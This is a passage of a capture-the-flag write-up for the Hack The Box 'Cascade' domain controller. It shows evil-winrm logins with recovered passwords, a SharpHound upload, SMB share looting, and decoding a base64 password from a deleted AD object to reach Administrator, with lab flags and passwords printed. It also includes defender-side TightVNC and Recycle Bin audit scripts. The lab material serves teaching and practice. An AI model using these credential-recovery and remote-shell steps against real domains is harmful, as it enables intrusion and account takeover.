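"AllowLoopback"=dword:00000000
"""

_VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Return {key_path: {value_name: value}} for the REG_SZ, dword and hex forms."""
    text = text.lstrip("\ufeff")                       # drop a BOM if present
    text = re.sub(r"\\\r?\n\s*", "", text)              # join hex continuation lines
    keys: Dict[str, Dict[str, RegValue]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, rhs = m.groups()
        if rhs.startswith('"') and rhs.endswith('"'):
            keys[current][name] = rhs[1:-1]                               # REG_SZ
        elif rhs.startswith("dword:"):
            keys[current][name] = int(rhs[6:], 16)                        # REG_DWORD
        elif rhs.startswith("hex:"):
            keys[current][name] = bytes.fromhex(rhs[4:].replace(",", ""))  # REG_BINARY
        else:
            keys[current][name] = rhs                                     # unknown form
    return keys


# Defender's checklist: (value name, test that marks it risky, message).
CHECKS: List[Tuple[str, Callable[[RegValue], bool], str]] = [
    ("Password", lambda v: isinstance(v, bytes) and len(v) == 8,
     "8-byte VNC password stored in the registry; it is obfuscated with a fixed "
     "key, not hashed, so treat the export as a credential"),
    ("UseVncAuthentication", lambda v: v == 0, "RFB authentication disabled"),
    ("LoopbackOnly", lambda v: v == 0, "server listens on all interfaces"),
    ("IpAccessControl", lambda v: v == "", "no IP access-control list configured"),
    ("AcceptHttpConnections", lambda v: v == 1, "HTTP/Java viewer port enabled"),
    ("EnableFileTransfers", lambda v: v == 1, "file transfer enabled for VNC clients"),
]


def audit_tightvnc(keys: Dict[str, Dict[str, RegValue]]) -> List[str]:
    """Return one finding per risky setting under a ...\\TightVNC\\Server key."""
    findings: List[str] = []
    for path, values in keys.items():
        if not path.lower().endswith("\\tightvnc\\server"):
            continue
        for name, is_risky, message in CHECKS:
            if name in values and is_risky(values[name]):
                findings.append(f"{name}: {message}")
    return findings


if __name__ == "__main__":
    for finding in audit_tightvnc(parse_reg(SAMPLE_REG)):
        print(finding)
```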
Run crackmapexec:
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
Using evil-winrm we get the user.txt flag: 795b883bce48e25112c2183f92466
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ls
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/11/2023 10:47 AM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat users.txt
Cannot find path 'C:\Users\s.smith\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\s.smith\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
795b883bce48e25112c2183f92466
Privesc
Copy SharpHound to the cascade folder:
┌──(kali㉿kali)-[~/Downloads]
└─$ cd Bloodhound_3
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml Ingestors package-lock.json webpack.config.development.js
BloodHoundExampleDB.db LICENSE-3RD-PARTY.md README.md webpack.config.production.js
deploy.sh LICENSE.md renderer.js
docs main.js server.js
index.html package.json src
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds SharpHound.exe SharpHound.ps1
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SSharpHound.exe /home/kali/HTB/cascade
cp: cannot stat 'SSharpHound.exe': No such file or directory
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SharpHound.exe /home/kali/HTB/cascade
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
Upload SharpHound to the target with evil-winrm, run it, then download the zip back to Kali:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /home/kali/HTB/cascade/SharpHound.exe
Info: Uploading /home/kali/HTB/cascade/SharpHound.exe to C:\Users\s.smith\Documents\SharpHound.exe
Data: 1111380 bytes of 1111380 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2023 12:51 AM 833536 SharpHound.exe
*Evil-WinRM* PS C:\Users\s.smith\Documents> ./SharpHound.exe
------------------------------------------------
Initializing SharpHound at 12:55 AM on 9/13/2023
------------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain CASCADE.LOCAL using path CN=Schema,CN=Configuration,DC=CASCADE,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 18 MB RAM
Status: 81 objects finished (+81 Infinity)/s -- Using 26 MB RAM
Enumeration finished in 00:00:00.4488100
Compressing data to .\20230913005544_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 12:55 AM on 9/13/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2023 12:55 AM 9940 20230913005544_BloodHound.zip
-a---- 9/13/2023 12:55 AM 14433 OTJmMzFjYTUtNzc3NS00YWZjLWEyODgtYTY3MDg2YzBiNzgx.bin
-a---- 9/13/2023 12:51 AM 833536 SharpHound.exe
*Evil-WinRM* PS C:\Users\s.smith\Documents> download 20230913005544_BloodHound.zip
Info: Downloading C:\Users\s.smith\Documents\20230913005544_BloodHound.zip to 20230913005544_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents>
Started neo4j, ran BloodHound and imported the zip.
Next, try aclpwn and see if it finds a path:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ ~/.local/bin/aclpwn -f [email protected] -t cascade.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.182 -sp sT333ve2
[!] No path found!
┌──(kali㉿kali)-[~/HTB/cascade]
Check what groups s.smith is in:
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/28/2020 8:58:05 PM
Password expires Never
Password changeable 1/28/2020 8:58:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script MapAuditDrive.vbs
User profile
Home directory
Last logon 1/29/2020 12:26:39 AM
Logon hours allowed All
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name Audit Share
Comment \\Casc-DC1\Audit$
Members
-------------------------------------------------------------------------------
s.smith
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup IT
Alias name IT
Comment
Members
-------------------------------------------------------------------------------
arksvc
r.thompson
s.smith
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Remote Management Use"
net.exe : System error 1376 has occurred.
+ CategoryInfo : NotSpecified: (System error 1376 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The specified local group does not exist.
Use crackmapexec to list the shares as s.smith:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$ READ
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
We have read access to Audit$. We connect to it with smbclient and download all of the files to Kali:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1625087 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1625087 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: \DB\> get CascAudit.exe
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \DB\CascAudit.exe
smb: \DB\> cd ../
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (9.3 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (129.4 KiloBytes/sec) (average 50.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (37.8 KiloBytes/sec) (average 45.5 KiloBytes/sec)
smb: \> cd x64
smb: \x64\> ls
. D 0 Sun Jan 26 17:25:27 2020
.. D 0 Sun Jan 26 17:25:27 2020
SQLite.Interop.dll A 1639936 Sun Oct 27 02:39:20 2019
6553343 blocks of size 4096. 1624828 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (264.6 KiloBytes/sec) (average 116.5 KiloBytes/sec)
smb: \x64\> cd ../x86
smb: \x86\> ls
. D 0 Sun Jan 26 17:25:27 2020
.. D 0 Sun Jan 26 17:25:27 2020
SQLite.Interop.dll A 1246720 Sun Oct 27 02:34:20 2019
6553343 blocks of size 4096. 1624828 blocks available
smb: \x86\>
Next I try reading the database; I asked ChatGPT how 🙂
sudo apt update
sudo apt install sqlite3
sqlite3 Audit.db
.tables
SELECT * FROM DeletedUserAudit;
└─$ sqlite3 Audit.db
SQLite version 3.42.0 2023-05-16 12:36:15
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> SELECT * FROM Misc;
sqlite>
We can check which groups ArkSvc is in:
```bash
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents>
```
I asked ChatGPT about this output:
Based on the information provided, there are a few key points of interest regarding the ArkSvc user:
Local Group Memberships:
AD Recycle Bin: This is intriguing because if this user has rights to access the Active Directory (AD) Recycle Bin, they may be able to recover deleted AD objects. This could lead to potential privilege escalation or information disclosure vulnerabilities.
I asked ChatGPT how to enumerate further and for tips on using Evil-WinRM. But first we need the password.
Load the Active Directory module: Import-Module ActiveDirectory
Enumerate the deleted objects: Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *
Restore a deleted object (if needed): $deletedUser = Get-ADObject -Filter 'SamAccountName -eq "desired_username"' -IncludeDeletedObjects
Restore-ADObject -Identity $deletedUser.ObjectGuid
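As an added defender-side check (not part of the writeup or of any tool it uses), the following PowerShell audits the same Recycle Bin data the steps above query: it lists who holds the "AD Recycle Bin" group membership seen on this box, then scans every tombstoned object for string attributes whose name suggests a credential or whose value base64-decodes to printable text, which is how the cascadeLegacyPwd attribute later on this page looks. It assumes the ActiveDirectory module and rights to read deleted objects; the group name, the attribute-name regex and the minimum length are assumptions for this environment.

```powershell
# Added audit example (not from the writeup). Assumes the ActiveDirectory module is
# available and the running account can read deleted objects. Group name and regex are
# assumptions for this environment; the attribute name cascadeLegacyPwd is from the box.
Import-Module ActiveDirectory

# Attribute names that suggest a stored credential (-match is case-insensitive).
$suspectName = 'pwd|pass|legacy|secret'

function Test-LooksBase64Text {
    # True when $Value is valid base64 that decodes to printable ASCII, the shape a
    # base64-wrapped plaintext password has. Binary blobs and short tokens return false.
    param([string]$Value)
    if ($Value.Length -lt 8 -or $Value.Length % 4 -ne 0) { return $false }
    if ($Value -notmatch '^[A-Za-z0-9+/]+={0,2}$') { return $false }
    try { $bytes = [Convert]::FromBase64String($Value) } catch { return $false }
    $text = [Text.Encoding]::ASCII.GetString($bytes)
    return ($text -match '^[\x20-\x7E]+$')
}

# 1. Review who can read tombstoned objects; on this box that was the "AD Recycle Bin" group.
Write-Host "Members of 'AD Recycle Bin':"
Get-ADGroupMember -Identity 'AD Recycle Bin' -Recursive |
    Select-Object SamAccountName, objectClass | Format-Table -AutoSize

# 2. Scan every deleted object for credential-looking string attributes.
$deleted = Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
    -IncludeDeletedObjects -Properties *

$findings = foreach ($obj in $deleted) {
    foreach ($attr in $obj.PropertyNames) {
        $val = $obj.$attr
        if ($val -isnot [string]) { continue }   # skip ints, booleans, multi-valued attrs
        if ($attr -match $suspectName -or (Test-LooksBase64Text $val)) {
            [PSCustomObject]@{
                Object    = $obj.'msDS-LastKnownRDN'
                Attribute = $attr
                Value     = $val
            }
        }
    }
}

if ($findings) {
    Write-Host "Tombstoned objects carrying credential-like attributes:"
    $findings | Format-Table -AutoSize
} else {
    Write-Host "No credential-like attributes found on deleted objects."
}
```

Any hit is a cleanup item: clear the attribute on the object (or purge the tombstone) and rotate the credential, since Recycle Bin readers can recover it exactly as shown on this page.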
How to read the DLL on Kali using dnSpy (tips from ChatGPT):
wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y apt-transport-https
sudo apt-get update
sudo apt-get install -y dotnet-sdk-3.1
Download and unzip dnSpy from https://github.com/0xd4d/dnSpy/releases
unzip dnSpy-netcore-win64.zip
Run dnSpy:
cd dnSpy-netcore-win64
dotnet dnSpy.dll
I struggled with the above, but found that the password can be decrypted with a custom script published online for this box. The password is w3lc0meFr31nd.
We run the previous commands in Evil-WinRM as arksvc:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
At the bottom of the output we can see the TempAdmin account:
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
We can see the cascadeLegacyPwd value YmFDVDNyMWFOMDBkbGVz; we try to decode it as base64:
┌──(kali㉿kali)-[~]
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
┌──(kali㉿kali)-[~]
└─$
Because the email mentioned that this account shared the same password as the Administrator, we test that password against the Administrator account:
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec winrm 10.10.10.182 -u Administrator -p baCT3r1aN00dles
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
Pwned.
d-r--- 1/28/2020 6:26 PM Documents
d-r--- 1/26/2020 11:56 PM Downloads
d-r--- 1/26/2020 11:56 PM Favorites
d-r--- 1/26/2020 11:56 PM Links
d-r--- 1/26/2020 11:56 PM Music
d-r--- 1/26/2020 11:56 PM Pictures
d-r--- 1/26/2020 11:56 PM Saved Games
d-r--- 1/26/2020 11:56 PM Searches
d-r--- 1/26/2020 11:56 PM Videos
-a---- 3/25/2020 11:17 AM 645729 wds_current_setup.exe
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/13/2023 12:27 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e9f7e5fccd0b570fffadd6190b3282f4